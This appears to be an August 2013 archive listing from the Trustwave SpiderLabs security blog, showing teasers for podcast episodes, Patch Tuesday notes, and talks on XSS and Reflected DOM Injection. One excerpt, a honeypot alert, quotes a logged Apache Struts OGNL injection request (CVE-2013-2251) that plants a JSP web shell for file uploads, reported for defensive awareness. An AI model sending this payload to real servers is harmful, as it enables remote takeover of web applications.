Showing 15 results for: August 2013 ×

SpiderLabs Radio August 30, 2013 w/ Space Rogue

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs. This weeks epsidoe features stories about Syrian Electronic Army takes out DNS, Underground Intelligence Agency, Yahoo header, YAZDIJ, OSX sudo, Chinese DDoS, Google.ps,...

SpiderLabs Radio August 23, 2013 w/ Space Rogue

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs. This weeks epsidoe features stories about FaceBook Bug Bounty Denied, Maritania Attacker missed Twitter, UbiSoft, League of Legends, Ramnit Hits Steam, nMap, FBI...

SpiderLabs Radio August 16, 2013 w/ Space Rogue

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs. This weeks epsidoe features stories about New York Times hacked? NOT!, Android, Android, Android, Java SecureRandom, 1 Million Malicous Apps, Bug Bounty Wars,...

[Honeypot Alert] Probes for Apache Struts 2.X OGNL Vulnerability

Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251): 222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action? redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest' ),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\" ),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c %22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull) (new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%2 2f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2" Struts users are strongly encouraged...

The Web IS Vulnerable: XSS on the Battlefront (Part 1)

<script> //<![CDATA[ var str1 = &quot;http://&quot;; var str2 = &quot;www.modsecurity.org&quot;; var str3 = &quot;/beacon.html&quot;; var result = str1 + str2 + str3; window.location=result //]]>// </script> For those of you who were not able to make it to our talk at Blackhat USA, this...

Microsoft Pulls MS13-061 Update for Exchange

Microsoft has pulled one of the three critical patches from yesterdays Patch Tuesday, MS13-061, from further distribution. It seems that applying this update to Exchange Server 2013 results in the Content Index for mailbox databases showing as Failed and the...

Microsoft Patch Tuesday, August 2013

The big news this month in Microsoft's Active Protections Program, other than the eight new bulletins, is the expansion of the MAPP program. First Microsoft will be giving select companies like Trustwave a few extra days of advance notification for...

The Way of the Cryptologist

Right before DEF CON, a friend of mine reached out to me to ask if I would write a crypto challenge for his CTF. While it was a busy time for me, I didn't want to pass up the chance...

Fun with 'Active Defense'

Active Defense is steadily becoming a popular trend in the security field, both in a theoretical and practical approach. From its humble beginnings it has made its way to a fully functional software implementations that aim at making your attacker's...

SpiderLabs Radio August 9, 2013 w/ Space Rogue

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs. This weeks epsidoe features stories about Not TOR or ToR but Tor, Freedom Hosting, FBI Malware, Peoples Car blocks Megamos vuln, Research down...

Introducing RDI – Reflected DOM Injection

The other day at DEFCON 21 we (Daniel Chechik and Anat Davidi) gave a talk introducing a new technique for delivering exploits by utilizing popular websites, we named the technique RDI which stands for "Reflected DOM Injection", and we explained...

SpiderLabs Radio August 2, 2013 w/ Space Rogue

This weeks episode of SpiderLabs Radio hosted by Space Rogue is brought to you by Trustwave SpiderLabs. In honor of the craziness that is the security week in Vegas of Blackhat, BSides and Defcon there will be no news broadcast...